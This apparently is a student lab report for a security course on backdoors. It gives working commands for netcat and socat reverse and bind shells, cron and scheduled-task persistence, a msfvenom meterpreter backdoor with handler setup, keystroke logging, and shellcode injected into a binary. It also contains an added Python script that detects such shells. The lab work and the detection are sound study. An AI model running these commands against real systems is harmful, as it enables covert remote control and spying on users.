Table of Contents
I. Experiment content and answers to basic questions
II. Tool preparation
- View the Windows IP and the Linux IP
- Windows gets a Linux shell
- Linux gets a Windows shell
- Transferring data with nc
III. Experiment process
- Use netcat to get a shell on the host, started by cron
- Use socat to get a shell on the host, started by a scheduled task
- Use MSF meterpreter (or other software) to generate an executable, transfer it to the host with ncat or socat, run it and get the host's shell
- Use MSF meterpreter (or other software) to generate a program that obtains audio, camera images, keystroke records, etc. from the target host, and attempt privilege escalation
- Optional extra credit: use MSF to generate shellcode, inject it into pwn1 from experiment 1, and obtain a reverse-connection shell
IV. Problems and reflections
I. Experiment content and answers to basic questions
1. Experiment content
(1) Use netcat to get a shell on the host, started by cron (0.5 points)
(2) Use socat to get a shell on the host, started by a scheduled task (0.5 points)
(3) Use MSF meterpreter (or other software) to generate an executable, transfer it to the host with ncat or socat, run it and get the host's shell (0.5 points)
(4) Use MSF meterpreter (or other software) to generate a program that obtains audio, camera images, keystroke records, etc. from the target host, and attempt privilege escalation (2 points)
(5) Optional extra credit: use MSF to generate shellcode, inject it into pwn1 from experiment 1, and obtain a reverse-connection shell (1 point). Write this up in the report together with the rest of this experiment.
2. Answers to basic questions
(1) What possible ways can you think of for a backdoor to get into your system?
- Cracking the password of a Linux account
- Replacing the login program with one that accepts a special password for a hidden login
- Hiding the backdoor in the file system
(2) What ways do you know of for a backdoor to start up (on Windows and Linux)? Give examples.
- Linux: a Trojan can be started on a timer through the crontab function, so the controller can keep monitoring its status and start the backdoor periodically; it can also be bound to a normal program and then injected with shellcode that opens the backdoor.
- Windows: the backdoor is received passively or downloaded, and it starts when the victim clicks to run it.
(3) Which Meterpreter functions left a deep impression on you?
- Basic functions (basic connectivity, executing instructions)
- Extended functions (such as collecting user information, installing services, etc.)
(4) How can you find out whether a backdoor has been installed on your system?
- Install antivirus software for real-time protection.
- Check network connections: look for IPs that have established a connection with the machine.
II. Tool preparation
View the Windows IP and the Linux IP
- Under Windows, use the command ipconfig
- Under Linux, use ifconfig
Windows gets a Linux shell
- Use the ncat program and enter ncat.exe -l -p 5224 to listen on port 5224 of the local machine
- In kali, use the -e option of the nc command: enter nc 192.168.1.2 5224 -e /bin/sh to make a reverse connection to port 5224 of the Windows host
- On the Windows side, the kali shell can now be accessed
Linux gets a Windows shell
- Use the nc command to listen on port 5224
- In Windows, use the -e option of the ncat.exe program to make a reverse connection to port 5224 of the kali host
- At this point the Windows command prompt can be seen in kali, and Windows commands can be entered (dir is entered here)
Transferring data with nc
- Windows listens on port 5224
- Under kali, connect to port 5224 of Windows
- A data transfer connection is established
III. Experiment process
Use netcat to get a shell on the host, started by cron
- Windows listens on port 5224
- In kali, use crontab -e to edit a scheduled task; select editor 3
- Add a line at the end: 24 * * * * /bin/netcat 192.168.1.2 5224 -e /bin/sh, which means a reverse connection to port 5224 of the Windows host in the 24th minute of every hour
- When the time reached 14:24, the kali shell was obtained and commands could be entered
Use socat to get a shell on the host, started by a scheduled task
socat is an enhanced version of ncat. The format it uses is socat [options] <address> <address>, where the two addresses are mandatory and the options are optional.
The basic function of socat is to create two bidirectional byte streams and transfer data between them; its parameters are the addresses, each of which represents a direction. The so-called stream represents the flow of data, which can be of many different types, so the command needs a number of options to define and describe the corresponding kinds of data flow.
- In a Win10 system, right-click the Windows icon at the bottom left of the screen and choose "Computer Management" (or simply search for "Computer Management")
- Create a task in Task Scheduler, fill in the task name, and create a new trigger
- Under Actions > Program or script, choose the file path of socat.exe, and in the "Add arguments" field fill in tcp-listen:5224 exec:cmd.exe,pty,stderr. This command binds cmd.exe to port 5224 and redirects the stderr of cmd.exe to stdout
- Once created, the task is found to be in the Ready state. Press the Windows + L shortcut to lock the computer; after unlocking, find the task you created and double-click it, and the task created earlier is found to have started running
- At this point, enter the command socat - tcp:192.168.1.2:5224 in the kali environment. The first argument, -, represents standard input and output, and the second is a stream to port 5224 of the Windows host. At this point a cmd shell has been successfully obtained
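The answers to questions (2) and (4) above, together with the cron and scheduled-task persistence steps just described, can be checked from the defender's side. The following Python script is an added example and is not part of the original report: it flags crontab lines, Windows scheduled tasks (from the CSV produced by schtasks /query /fo CSV /v) and netstat -anp style sockets that run nc, ncat, netcat or socat with a spawned shell, which is exactly the pattern the two persistence steps leave behind. The sample crontab, task list and socket table embedded in it are constructed; the host names, task names and process ids are placeholders, and the "Task To Run" column name is assumed from the verbose CSV format of schtasks.

```python
"""Added detection example (not part of the original report): flag cron
entries, Windows scheduled tasks and sockets that look like the nc/ncat/socat
shells the report sets up.  All sample input below is constructed."""
import csv
import io
import re

# Tools and shell-spawning flags as used in the report: nc/netcat/ncat -e, socat exec:
SHELL_TOOL = re.compile(r"\b(nc|netcat|ncat|socat)(\.exe)?\b", re.IGNORECASE)
SHELL_SPAWN = re.compile(r"(\s-e\s+\S*(sh|cmd\.exe)\b|\bexec:\S*(sh|cmd\.exe)\b)",
                         re.IGNORECASE)


def is_shell_persistence(command):
    """True if a command line runs nc/ncat/socat and hands it a shell."""
    return bool(SHELL_TOOL.search(command) and SHELL_SPAWN.search(command))


def scan_crontab(text):
    """Return (schedule, command) for crontab lines whose command spawns a shell."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)      # five schedule fields, then the command
        if len(fields) < 6:
            continue
        schedule, command = " ".join(fields[:5]), fields[5]
        if is_shell_persistence(command):
            hits.append((schedule, command))
    return hits


def scan_schtasks_csv(text):
    """Return task names from 'schtasks /query /fo CSV /v' output whose
    'Task To Run' column (assumed column name) spawns a shell via nc/ncat/socat."""
    return [row["TaskName"] for row in csv.DictReader(io.StringIO(text))
            if is_shell_persistence(row.get("Task To Run", ""))]


def scan_netstat(text):
    """Return (state, peer_or_local, program) for TCP sockets in 'netstat -anp'
    style output owned by nc/ncat/socat: an ESTABLISHED one is a live reverse
    shell candidate, a LISTEN one is a bind shell candidate."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 7 or not parts[0].startswith("tcp"):
            continue
        local, remote, state, program = parts[3], parts[4], parts[5], parts[6]
        if SHELL_TOOL.search(program) and state in ("ESTABLISHED", "LISTEN"):
            hits.append((state, remote if state == "ESTABLISHED" else local, program))
    return hits


# --- constructed samples (hosts, task names and pids are placeholders) ---
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt update
24 * * * * /bin/netcat 192.168.1.2 5224 -e /bin/sh
"""
SAMPLE_SCHTASKS = """\
"HostName","TaskName","Next Run Time","Status","Task To Run"
"WIN10","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","N/A","Ready","%windir%\\defrag.exe -c"
"WIN10","\\update","N/A","Running","C:\\tools\\socat.exe tcp-listen:5224 exec:cmd.exe,pty,stderr"
"""
SAMPLE_NETSTAT = """\
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 192.168.182.128:41026   192.168.1.2:5224        ESTABLISHED 2211/netcat
tcp        0      0 0.0.0.0:5224            0.0.0.0:*               LISTEN      2350/socat
"""

if __name__ == "__main__":
    print("crontab hits :", scan_crontab(SAMPLE_CRONTAB))
    print("schtasks hits:", scan_schtasks_csv(SAMPLE_SCHTASKS))
    print("netstat hits :", scan_netstat(SAMPLE_NETSTAT))
```

On a real host the three inputs would come from crontab -l (for every user, plus /etc/cron.d), schtasks /query /fo CSV /v, and netstat -anp run as root so that the program column is filled in; a hit on the crontab or task list is the persistence itself, while a hit in the socket table shows the shell is currently connected or waiting.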
Use MSF meterpreter to generate an executable, transfer it to the host with ncat or socat, run it and get the host's shell
- Enter the command msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.182.128 LPORT=5224 -f exe > 20175224_backdoor.exe to generate the backdoor. Note: the IP address here is the Linux IP
- Next, Windows enters receiving mode: ncat.exe -lv 5224 > 20175224_backdoor.exe
- Linux executes nc 192.168.1.2 5224 < 20175224_backdoor.exe. Note: close the antivirus software; the IP address here is that of the Windows host
- The file is transferred and received successfully
- Open a terminal in kali and enter the msfconsole command to enter the msf console
- Enter use exploit/multi/handler to enter the listening module
- Enter set payload windows/meterpreter/reverse_tcp to set the payload
- Enter set LHOST 192.168.182.128 and set LPORT 5224 in turn to set the IP and port. Note: the IP address specified here is the Linux IP, the same IP used when generating the backdoor
- Setup is complete; start listening with exploit
- Run the backdoor under Windows
- kali has received the connection from the Windows host, and obtains a shell for remote control
Use MSF meterpreter to generate a program that obtains audio, camera images and keystroke records from the target host
- Use the record_mic command to capture audio (could not be done because the desktop at home has no headset)
- Use the webcam_snap command to take a picture with the camera (could not be done because the desktop at home has no camera configured)
- Use the screenshot command to take a screenshot
- Use the keyscan_start command to start recording keystrokes, and the keyscan_dump command to read the recorded keystrokes
Optional extra credit: use MSF to generate shellcode, inject it into pwn1 from experiment 1, and obtain a reverse-connection shell
- Use the command msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.182.128 LPORT=5224 -x /root/Desktop/20175224/exp2/pwn1 -f elf > 5224pwn to generate shellcode using the pwn1 file as a template, producing the elf file 5224pwn (reference: https://www.cnblogs.com/clever-universe/p/8691365.html)
- Enter the command msfconsole to enter the msf command line, then enter the following in turn:
  use exploit/multi/handler                        /* enter handler mode */
  set payload linux/x86/meterpreter/reverse_tcp    /* set the payload matching the generated backdoor */
  show options                                     /* check the current status information */
  set LHOST 192.168.182.128                        /* set LHOST; the IP is the attacker's Linux IP */
  set LPORT 5224                                   /* set LPORT */
  exploit                                          /* start the listener */
- Run the backdoor file 5224pwn on kali. When executing pwn2 in kali, first grant execute permission: chmod +x 5224pwn
- At this point the attacker's Linux has obtained the connection, and gets a shell for remote control
IV. Problems and reflections
Problems encountered in the experiment
- Problem 1: after kali connects back with nc, the host shows nothing
- Solution to problem 1: enter a command such as ls in the blank area and then press Enter
Experimental experience
This experiment is about backdoors. Its principle is easier to understand than that of the first experiment, but because software has to be used for the operations, it was a little more troublesome than the first time. Through this experiment my mastery of the knowledge improved significantly, and I learned a lot of things, which is very delightful.
I also found the experiment very interesting, and I look forward to the next one!